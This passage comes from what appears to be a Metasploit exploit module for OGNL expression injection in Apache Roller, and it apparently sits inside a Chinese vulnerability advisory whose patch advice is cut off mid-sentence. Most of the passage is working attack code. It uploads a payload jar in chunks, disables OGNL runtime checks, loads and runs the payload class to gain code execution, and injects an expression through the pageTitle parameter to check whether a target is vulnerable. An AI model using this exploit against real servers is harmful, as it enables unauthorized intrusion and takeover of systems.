parts = jar.chars.each_slice(chunk_length).map(&:join)
parts.each do |part|
java_upload_part(part, @payload_exe, append)
append = 'true'
end
register_files_for_cleanup("#{@payload_exe}null", "#{@payload_exe}#{@random_suffix}")
cmd = ""
# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
cmd << "#q.setAccessible(true),#q.set(null,true),"
cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
cmd << "#q.setAccessible(true),#q.set(null,false),"
# create classloader
cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new
java.io.File('#{@payload_exe}'+#a).toURI().toURL()}),#a='#{rand_text_alphanumeric(4)}',"
# load class
cmd << "#c=#cl.loadClass('metasploit.Payload'),"
# invoke main method
cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
execute_command(cmd)
end
def check
addend_one = rand_text_numeric(rand(3) + 1).to_i
addend_two = rand_text_numeric(rand(3) + 1).to_i
sum = addend_one + addend_two
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s, "roller-ui", "login.rol"),
'vars_get' =>
{
'pageTitle' => "${new java.lang.Integer(#{addend_one}+#{addend_two})}",
}
})
if res and res.code == 200 and res.body =~ /#{sum}/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: